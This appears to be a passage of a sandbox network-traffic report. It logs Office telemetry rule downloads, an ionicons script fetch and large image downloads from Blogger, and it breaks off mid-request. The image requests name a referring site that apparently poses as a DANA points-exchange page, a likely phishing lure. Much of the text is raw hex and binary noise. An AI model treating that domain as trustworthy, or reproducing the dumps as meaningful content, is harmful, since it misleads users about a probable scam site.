                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            52192.168.2.64979113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:11 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 486
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                            x-ms-request-id: 0a3893d3-c01e-0082-33ee-16af72000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115011Z-1657d5bbd48qjg85buwfdynm5w000000020000000000b1cv
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:11 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            53192.168.2.64979213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:11 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                            x-ms-request-id: 99ffd5e0-b01e-0053-0101-17cdf8000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115011Z-1657d5bbd48qjg85buwfdynm5w0000000210000000008d3s
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:11 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            54192.168.2.649793104.17.247.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC375OUTGET /ionicons@7.1.0/dist/ionicons/p-40ae2aa7.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:11 UTC576INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"446-Txl4AaMXTHFEqGcTKKB8nQp2w2M"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01HRW74HR1056C4E8M8PP3EXF1-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 17871407
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56eb49c2041e3-EWR
                                                                                                                            2024-10-06 11:50:11 UTC793INData Raw: 34 34 36 0d 0a 69 6d 70 6f 72 74 7b 67 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 70 2d 64 31 35 65 63 33 30 37 2e 6a 73 22 3b 6c 65 74 20 74 3b 63 6f 6e 73 74 20 65 3d 28 29 3d 3e 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 6e 65 77 20 4d 61 70 3b 69 66 28 21 74 29 7b 63 6f 6e 73 74 20 6e 3d 77 69 6e 64 6f 77 3b 6e 2e 49 6f 6e 69 63 6f 6e 73 3d 6e 2e 49 6f 6e 69 63 6f 6e 73 7c 7c 7b 7d 2c 74 3d 6e 2e 49 6f 6e 69 63 6f 6e 73 2e 6d 61 70 3d 6e 2e 49 6f 6e 69 63 6f 6e 73 2e 6d 61 70 7c 7c 6e 65 77 20 4d 61 70 7d 72 65 74 75 72 6e 20 74 7d 2c 72 3d 6e 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 28 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 74 2e 73 65 74 28
                                                                                                                            Data Ascii: 446import{g as n}from"./p-d15ec307.js";let t;const e=()=>{if("undefined"==typeof window)return new Map;if(!t){const n=window;n.Ionicons=n.Ionicons||{},t=n.Ionicons.map=n.Ionicons.map||new Map}return t},r=n=>{const t=e();Object.keys(n).forEach((e=>t.set(
                                                                                                                            2024-10-06 11:50:11 UTC308INData Raw: 6f 6e 73 74 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 74 29 26 26 28 6e 75 6c 6c 21 3d 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 26 26 28 65 5b 74 5d 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 2c 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 74 29 29 7d 29 29 2c 65 7d 2c 63 3d 6e 3d 3e 6e 26 26 22 22 21 3d 3d 6e 2e 64 69 72 3f 22 72 74 6c 22 3d 3d 3d 6e 2e 64 69 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 22 72 74 6c 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 64 6f 63 75 6d 65 6e 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 6f 63 75 6d 65 6e 74 3f 76 6f 69 64 20 30 3a 64 6f 63 75 6d 65 6e 74 2e 64 69 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29
                                                                                                                            Data Ascii: onst e={};return t.forEach((t=>{n.hasAttribute(t)&&(null!==n.getAttribute(t)&&(e[t]=n.getAttribute(t)),n.removeAttribute(t))})),e},c=n=>n&&""!==n.dir?"rtl"===n.dir.toLowerCase():"rtl"===(null===document||void 0===document?void 0:document.dir.toLowerCase()
                                                                                                                            2024-10-06 11:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            55192.168.2.649796172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC916OUTGET /img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:12 UTC480INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73d"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:12 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="ezgif.com-crop (3).gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 1386608
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:12 UTC910INData Raw: 47 49 46 38 39 61 57 02 b0 03 f7 00 00 01 7d da 03 84 e5 03 8a f0 05 6b b9 05 8e f4 07 92 f8 08 8b ec 08 90 f4 09 81 d8 0a 85 df 0a 8d ed 0a 94 f8 0c 8b ea 0d 89 e6 0d 8b e6 0d 8b e8 0e 8b e8 0e 8c e8 0e 8c eb 0f 8c e9 10 8b e7 10 8c e5 11 89 e2 11 99 fb 12 8d e8 13 8f eb 18 86 d8 18 8a de 1a 7d c7 1b 8e e1 1b 94 e9 1e 6f aa 1e 97 eb 20 83 cc 22 75 b2 24 9e f7 26 73 a7 26 9d ec 2b aa fc 2d 85 ca 2f 72 9c 2f 7d b7 30 9d e8 31 a3 ed 33 96 df 35 90 d1 39 ac ee 3c 72 8d 3d 81 b5 3d ac f7 3e 79 9e 40 b7 f9 41 ab ee 48 78 91 49 7e a6 4a af f7 4a ba f6 4e 9a cd 4e b8 ef 4f a3 df 4f bd f4 54 b7 f8 54 c3 f4 55 ab e8 57 94 b8 58 84 a9 59 78 89 59 7e 99 5b b8 f8 5b c1 f4 5d c7 f4 60 bd fa 61 cc f6 65 aa de 66 a1 cd 66 bf f9 69 b2 e9 69 cf f9 6b c7 fa 6c c2 f9 6c d9
                                                                                                                            Data Ascii: GIF89aW}k}o "u$&s&+-/r/}01359<r==>y@AHxI~JJNNOOTTUWXYxY~[[]`aeffiikll
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: 06 5f 56 80 d9 12 e3 ca 9a 03 1f 46 3c 89 b3 a7 cf 9f 40 83 6a 5c 29 b1 a4 d0 a3 48 93 2a 15 79 f2 65 84 9b 42 a1 d6 74 1a d3 69 84 a5 02 a5 2a 25 ca 12 ab d7 af 60 7b ae a4 1a b6 ac d9 b3 0d 69 8e 7d a9 f5 67 db 90 64 5d 56 9c 69 74 e9 db a3 77 d1 ea dd 0b 54 27 42 ae 75 f9 0a 1e 8c 15 30 5b 9e 51 11 4f 7d 59 35 ee 56 c5 35 fd 1e e4 4a b8 b2 65 9f 79 2f 6b de cc b9 b3 40 ab 57 3d a7 cc 5c 10 b4 e8 d3 48 25 1b 24 8d ba b5 eb d7 b0 c3 aa 2e c8 7a 60 85 db b8 69 c6 de dd 71 36 c1 da bc 83 0b 1f 4e dc a0 ef 81 c0 27 e0 ce 1d ba b8 f3 a1 90 9f 4b 9f 4e 3d 78 72 d3 d5 9d 1f cf 1a 3d bb f7 ef e0 bd 6e ff 9f 70 9d 71 f8 e1 e3 b5 ea 3e cf be bd 7b 8d e9 21 af 97 bb 7c fe fb d3 f1 47 de df cf bf 7f c1 fc 13 61 e4 98 7f d6 75 87 1d 81 08 26 48 dd 5b a0 1d a8 e0 6b
                                                                                                                            Data Ascii: _VF<@j\)H*yeBti*%`{i}gd]VitwT'Bu0[QO}Y5V5Jey/k@W=\H%$.z`iq6N'KN=xr=npq>{!|Gau&H[k
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: c2 4d 1d a6 0e 41 26 6c 40 45 14 60 82 46 5c e2 6d 09 b4 22 4c 67 4a 53 2b 1a af 13 81 b5 db 27 24 71 87 13 84 60 53 dc 61 e8 0d 7c 70 04 ca 52 f6 08 38 58 81 39 0d b6 29 33 12 ec 36 07 93 00 20 d1 a4 02 17 dc e0 06 34 50 01 08 36 10 80 1a 31 40 27 2a ec a3 42 5f 94 81 15 ff c4 e0 b4 31 50 6d 07 58 d2 54 3f 4d 80 50 65 dd eb 03 d4 b5 81 18 f4 a0 07 37 50 41 07 b0 65 a8 25 e6 d0 56 75 75 d0 5c 71 c2 b8 35 ad a8 01 2f aa 00 12 24 71 89 b5 95 92 13 02 cc a2 2a 55 a9 40 91 25 4f 64 9f 90 db db 38 a1 89 1d 88 a0 03 55 1b eb 01 16 10 08 48 48 02 13 53 4c 20 24 f0 26 87 18 6c 20 55 02 20 c0 f5 a2 f4 94 04 74 20 54 25 f0 01 1e 0e 61 5f a7 91 e1 07 fc b2 66 a1 ae ca d0 64 12 40 00 20 30 82 1c fa 70 89 4b 30 c2 10 70 48 02 08 2c a0 01 0d dc 52 42 b7 dc 54 f8 1c 60
                                                                                                                            Data Ascii: MA&l@E`F\m"LgJS+'$q`Sa|pR8X9)36 4P61@'*B_1PmXT?MPe7PAe%Vuu\q5/$q*U@%Od8UHHSL $&l U t T%a_fd@ 0pK0pH,RBT`
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: 54 94 3c 32 44 44 f4 24 96 74 44 46 d9 94 25 22 23 4c 65 01 de f8 06 5d a6 4e 0b b4 09 6a 20 03 4d c4 50 04 00 33 d3 92 42 da c3 54 0a b3 2e 2d 10 8f 74 33 4f 9f c0 05 5a c9 00 0a 75 00 a6 e7 68 6b 30 04 a9 82 74 19 10 02 50 70 3c 91 e0 8c 73 c6 59 0c 09 37 78 00 04 61 e6 4c 19 d0 00 33 50 7d 9e 60 05 5a d9 47 bb 75 00 58 b6 36 72 00 03 a6 62 69 06 c0 00 08 30 03 d4 b7 09 9d 10 03 1c b0 00 12 40 35 ec 72 07 c2 18 08 43 00 33 64 24 48 33 90 40 8e a6 04 29 50 2d 75 e4 94 ae 79 24 48 59 49 1f 72 49 af 59 25 ec 51 5d d2 75 1f 2b f2 00 0c e0 8d 7a 70 40 80 75 95 59 d9 44 01 07 01 ea 18 6e 17 a4 24 02 b1 2e e8 c4 36 74 83 53 58 99 02 d4 52 3a c9 74 6d af 94 06 35 80 2a 74 94 01 1c f0 03 76 63 37 37 c0 01 4d ff b4 4b 9b c2 90 9e d0 09 78 60 03 e6 c4 44 28 24 00
                                                                                                                            Data Ascii: T<2DD$tDF%"#Le]Nj MP3BT.-t3OZuhk0tPp<sY7xaL3P}`ZGuX6rbi0@5rC3d$H3@)P-uy$HYIrIY%Q]u+zp@uYDn$.6tSXR:tm5*tvc77MKx`D($
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: c1 ea 92 8a ec c2 72 f0 02 08 c0 01 08 90 ce 09 30 00 a7 79 95 70 8a a5 96 96 c9 14 f7 c9 e0 da c9 8f 01 ca 5e c2 27 16 93 06 5a 96 5e 98 c0 36 8c 80 07 38 30 02 17 70 00 0d 3c 02 3d 70 05 72 c0 60 8c d0 61 51 d6 45 1d 16 63 5d 54 4a 77 53 06 d0 3b 11 37 ea c5 d9 86 6b 8d 27 bc 96 90 06 41 c0 02 1b c0 44 7f b3 29 6f f0 b0 f9 c9 9e f5 89 7f 9e 46 ab b6 7a 68 da fc 98 01 36 60 c3 ff 52 c8 d4 5b b2 16 70 b2 0f 2b 07 43 10 3e 00 5b 00 0e 50 98 98 10 a1 d4 2a 60 1b f0 5b cf 25 27 e9 6b cf 19 81 2b 14 27 95 02 a0 04 31 4b bc e0 45 3c 87 80 07 60 00 05 5a fd 06 f1 42 4a 8b 0b 58 4a b6 64 71 8b 5f 6f 43 3c 00 94 07 3d 6d 4d 18 9d 01 89 b0 40 f4 44 40 45 9b 08 61 00 03 27 60 4e 2b 52 56 87 c2 47 c1 bb 09 14 5c 6e 7b d8 01 02 30 03 de 97 5e c9 3b 12 1b 20 a5 9f b6
                                                                                                                            Data Ascii: r0yp^'Z^680p<=pr`aQEc]TJwS;7k'AD)oFzh6`R[p+C>[P*`[%'k+'1KE<`ZBJXJdq_oC<=mM@D@Ea'`N+RVG\n{0^;
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: 16 29 80 3e 50 30 92 2d 5f a7 6c 8f c2 24 7b b8 e5 ff cb 06 12 4a 42 78 80 d2 e9 c9 08 bc 7b 0b 3f da f4 a9 da b5 2a 9d 02 45 09 74 c2 d8 97 14 1e 28 4f 1b 5c c2 03 06 19 18 4c 1f cb 57 02 86 0c 2f 41 22 67 5c de fc f9 e7 8e d1 af 67 df de fd dc bc 70 0f bf a7 5f ff 70 ce 92 16 12 6c d0 00 04 0e 24 4c 22 fa 84 b3 4f 3a 81 28 b4 85 36 b1 24 b3 4e 2c e9 22 08 0b 30 d8 c0 02 09 14 b0 ad a5 d8 d6 1a 8a b6 0b 59 d2 89 a8 94 b4 4a 6a 44 12 4b 4c aa 2d e5 1c 60 60 44 90 c8 0a 4f ab b6 50 d2 2a 3b 99 58 22 eb 2d 94 64 ac 6f 47 f3 e2 7b 6b 3e 1e 83 14 72 48 f8 5c fb 51 3d 22 93 34 6c 2f 93 f4 b3 60 03 c9 30 48 42 0e 4a 02 b4 c8 21 8c 2a e2 a4 b4 01 35 59 43 8a 10 4e c0 c0 02 08 a0 ea f0 3a f2 26 d8 f0 b9 da 6c 54 4f 46 90 20 30 71 ce 12 41 4a 6e 39 12 5b 1c 2b 3c
                                                                                                                            Data Ascii: )>P0-_l${JBx{?*Et(O\LW/A"g\gp_pl$L"O:(6$N,"0YJjDKL-``DOP*;X"-doG{k>rH\Q="4l/`0HBJ!*5YCN:&lTOF 0qAJn9[+<
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 73 b1 e5 5c eb 52 d4 b1 87 04 52 6f 97 ba dd ec 36 ae bb 91 0d 2f 60 a6 bb db ea 16 e6 bc e5 35 d4 7a d9 db 46 5e f6 d1 bd be a5 e3 7b a5 36 df e0 62 77 8a f8 dd e5 3b ed 5b da 31 c6 f7 bf 88 8a 2e 1e 89 cb 53 1f ea 16 af 21 3b f0 80 e7 57 60 06 ab 35 bf a6 35 21 64 3d 1b 5f 0b 9b 77 9c 12 76 b0 e3 28 ec df 0c 77 98 ba a2 e5 70 fe ec 4a de 05 cb 15 b0 22 76 d4 89 59 3c 62 0c 2f d6 bb fe 73 b1 86 7f 2b 63 14 bf f8 3d 35 76 70 5b 67 6c e2 0d 33 36 c0 fe fd 6b 89 75 1c 56 08 ab d8 c8 a4 ff 55 a7 6c c5 79 63 d0 7e 17 ca a3 3d 32 7a 9a fc da ff 42 b5 c1 48 ad af 82 2f 28 e0 83 56 f9 c1 43 f6 db 96 59 cc 5f 20 a7 97 30 68 16 33 63 d8 5c de 37 fb 51 a8 6b 9e 73 9b 75 5a 67 3b f7 57 ba 78 2e 62 7d f3 7c a8 38 63 eb 57 83 26 74 a1 0d 7d 68 44 27 5a d1 8b fe d5 61
                                                                                                                            Data Ascii: s\RRo6/`5zF^{6bw;[1.S!;W`55!d=_wv(wpJ"vY<b/s+c=5vp[gl36kuVUlyc~=2zBH/(VCY_ 0h3c\7QksuZg;Wx.b}|8cW&t}hD'Za
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: eb 4c 8e 0b b9 cc 3c c0 07 1c b4 93 c4 b4 d2 4c 39 8f 1c 4d d6 f4 3f d0 cc 91 ce 94 47 d5 14 cd d6 ac 21 f9 11 c3 b1 54 48 30 ac 0b c4 4b 4c bc dc 4d 73 13 4c ff 78 82 c2 63 e4 cb b4 04 c2 ce cb 47 10 83 cb e7 8a c5 34 13 4a af 3c cb 35 4a 45 f5 03 4a 7e ec 44 53 94 ce e8 d4 ba a8 ac 9c a9 d4 4e 2f 2c 4a ea a4 40 ec c4 45 f0 84 45 9e ac 32 e7 c4 9f ef 3c cf f5 6c bd f2 7c 4c 57 c4 bf f9 3c cf dc b3 ca 77 0b cb c5 84 be b9 b3 37 b3 94 4e fd b4 4b f8 6c 37 c2 dc 1a 1e 33 cf 84 f3 4b 11 34 b8 c0 1c cf 82 d4 4b dd 7c 48 18 fb 42 09 ed 3e dc 1c 46 e1 b4 3c e2 b4 3b 5f 3c ce 02 d5 c4 0c 2d c6 ec 5a c2 d9 db d0 af 64 42 c9 3c 42 05 15 4f a7 1c 42 24 6c b3 86 5b 51 ef 64 50 6b 4c a0 cb 1c ca 18 45 4e c6 6c a8 fd ec 9d 7f 94 cc cf 9b 3f ba f4 3d e6 a4 b7 c0 33 a9
                                                                                                                            Data Ascii: L<L9M?G!TH0KLMsLxcG4J<5JEJ~DSN/,J@EE2<l|LW<w7NKl73K4K|HB>F<;_<-ZdB<BOB$l[QdPkLENl?=3
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 69 9d de 69 9e d6 43 96 a6 80 42 b4 e7 9e 1e 6a 66 06 30 81 cd 63 92 36 dd 2a 95 d3 9e 14 69 58 06 65 7f ce 60 cd dd 60 a6 96 a9 4f 4e 6a 4b dc e4 5c b6 e1 52 36 d8 92 be e5 f7 ed cf 34 5e cb da 25 e6 19 de d5 81 d6 60 15 4b 6b 0c f4 dd 2f 3e ce 7e 2d 4b ae 06 d0 85 15 cb 62 c6 e2 63 26 99 2d 8e ea 5b c6 e7 ca 35 d5 57 46 55 81 06 68 c1 45 c1 7e 9e d0 08 25 ec 1c d4 e7 3f bb 10 6e f4 eb 16 83 e7 c9 49 e2 b7 6c e7 b1 06 4b db 78 ec cb 16 ac 97 0e 6c 38 d6 d2 9a ce 4e b9 fc d5 c5 36 44 11 d5 9a 89 4e 09 fd 4d ed 41 db 57 4a 73 6d d6 8e ed fe 5d 6d 7c f5 3b c8 b6 98 17 56 64 d0 66 dc dc be 52 ff 90 36 ba ab c6 d6 5b d4 6a b2 ee 68 56 0c 6e a9 be e9 2a c6 ea b3 3e 8f 93 be 4a a7 76 db df be dd c8 8d ee f1 ad ea fc 29 68 e9 25 b4 35 9d 47 8c fe e6 8f 3b 8e 4b
                                                                                                                            Data Ascii: iiCBjf0c6*iXe``ONjK\R64^%`Kk/>~-Kbc&-[5WFUhE~%?nIlKxl8N6DNMAWJsm]m|;VdfR6[jhVn*>Jv)h%5G;K
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 40 0d 62 a8 21 88 13 71 38 81 87 0e 99 58 41 88 00 0e 77 e1 89 0e d5 17 20 4a 2d a6 38 63 67 23 96 28 23 8d 39 a2 b6 a2 41 29 41 a4 63 46 b7 f9 f8 20 47 42 3e f4 23 90 49 76 66 a4 4a 4a 3a 79 95 85 02 39 18 98 93 b6 c1 f8 61 47 1e 52 58 25 97 eb 41 49 d0 94 5d 22 68 ff e3 95 2d a2 28 e6 7e 3c 0e 14 e3 89 2f aa 29 65 43 38 a2 39 e7 46 64 be 39 01 9b 26 d2 99 e2 8d 6d ee 49 62 99 72 16 19 a8 9f 7f 1a aa a2 49 60 c6 59 e8 a1 cb d9 99 e8 85 4d fe 79 db 96 59 06 08 a7 a4 8d 6a 2a d0 a3 51 46 8a e4 a6 c5 75 2a 41 a8 3b 42 aa d9 9d a5 aa ba db 48 56 a6 ba 6a 86 07 d2 29 eb 46 b4 c2 5a aa ad b7 ae 36 aa ae 0c 5e 4a 57 ae bd 3a c9 ab b0 f3 11 db 6b b0 17 25 5b ac 8e c7 32 eb 68 ab bd fd 8a eb b4 c2 9d fa 6c a3 ce 62 4b 9c b6 b0 2e 5b d1 b7 db 82 d8 ad b8 f3 51 fa
                                                                                                                            Data Ascii: @b!q8XAw J-8cg#(#9A)AcF GB>#IvfJJ:y9aGRX%AI]"h-(~</)eC89Fd9&mIbrI`YMyYj*QFu*A;BHVj)FZ6^JW:k%[2hlbK.[Q


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            56192.168.2.649795172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC918OUTGET /img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
